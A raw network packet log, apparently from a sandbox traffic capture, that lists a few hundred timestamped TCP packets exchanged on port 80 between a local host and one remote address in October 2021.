Oct 29, 2021 20:50:51.356620073 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356640100 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356657028 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356672049 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356672049 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356688976 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356703997 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356704950 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356722116 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356734991 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356738091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356754065 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356770992 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356782913 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356798887 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356801033 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356817007 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356863976 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356874943 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356888056 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356899977 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356914043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356925964 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356930971 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356949091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356965065 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356973886 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.356981993 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.356998920 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357008934 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357014894 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357033014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357038975 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357052088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357069016 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357095957 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357129097 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357147932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357172966 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357198954 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357220888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357225895 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357249022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357306957 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357386112 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357413054 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357435942 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357439041 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357459068 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357480049 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357547998 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357582092 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357598066 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357626915 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357647896 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357669115 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357692957 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357692003 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357714891 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357716084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357738972 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357755899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357758045 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357773066 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357793093 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357804060 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357815981 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357836962 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357846022 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357860088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357880116 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357886076 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357912064 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357934952 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357935905 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.357958078 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357980967 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.357990026 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.358002901 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358027935 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358032942 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.358051062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358071089 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.358073950 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358099937 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358115911 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.358123064 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358145952 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358164072 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.358170033 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358191013 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358206987 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.358211040 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.358252048 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.358933926 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.366642952 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.366672039 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.366688967 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.366705894 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.366723061 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.366739988 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.366755962 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.366771936 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.366806030 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.366887093 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.397471905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397515059 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397540092 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397567034 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397591114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397618055 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397638083 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397650957 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.397665977 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397696018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397720098 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397726059 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.397746086 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397757053 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.397773027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397783041 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.397802114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397826910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397836924 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.397850037 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397875071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397878885 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.397898912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397922993 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397933006 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.397943974 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397964954 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.397975922 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.397986889 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398010969 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398020983 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398037910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398056030 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398062944 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398087978 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398107052 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398113012 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398138046 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398159981 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398160934 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398184061 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398204088 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398211002 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398236036 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398261070 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398262978 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398283958 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398305893 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398308039 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398333073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398353100 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398355961 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398381948 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398403883 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398406029 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398430109 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398452044 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398454905 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398474932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398494005 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398500919 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398524046 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398545980 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398549080 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398570061 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398591042 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.398596048 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.398636103 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.402317047 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402343988 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402369022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402393103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402415991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402439117 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402456045 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402478933 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402476072 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.402503967 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402527094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402544022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402559996 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.402600050 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.402614117 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402657032 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402678967 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.402721882 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402739048 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402764082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402767897 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.402790070 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402815104 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402817965 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.402832031 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402854919 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.402954102 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.402980089 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403003931 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403007984 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.403021097 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403050900 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.403745890 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403773069 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403796911 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403820992 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403842926 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.403846025 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403868914 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403884888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403908014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403917074 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.403930902 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403954983 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403959990 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.403971910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.403987885 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.403995991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404021025 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404025078 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.404063940 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.404169083 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404186010 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404251099 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.404284000 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404308081 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404349089 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.404396057 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404412985 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404475927 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.404824018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404901028 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404926062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404948950 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404954910 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.404973030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.404995918 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.405004978 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.405011892 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.405054092 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.405158043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.405183077 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.405204058 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.405210018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.405235052 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.405250072 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.405257940 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.405304909 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.423372984 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423393965 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423408985 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423427105 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423443079 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423458099 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423472881 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423506021 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423521996 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423532963 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423542023 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.423559904 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.423655033 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.453747988 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.453774929 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.453794956 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.453813076 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.453831911 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.453850031 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.453864098 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.453933954 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.454027891 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.454108953 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454128981 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454145908 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454159975 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454176903 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454195023 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454214096 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454215050 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.454229116 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454257965 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.454281092 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.454503059 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454667091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454687119 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454704046 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454721928 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454725027 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.454741001 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454754114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.454761982 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.454804897 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.454992056 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455012083 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455029964 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455054045 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455076933 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455102921 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455219984 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455254078 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455271959 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455271006 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455291986 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455311060 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455319881 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455328941 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455343962 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455368996 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455379009 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455399990 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455410004 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455420971 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455434084 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455450058 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455502987 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455637932 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455743074 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455768108 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455790043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455801010 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455813885 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455835104 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.455837965 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455856085 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.455909967 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.456451893 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456532955 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.456582069 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456607103 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456648111 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.456662893 CEST	49866	80	192.168.2.4	45.141.84.21
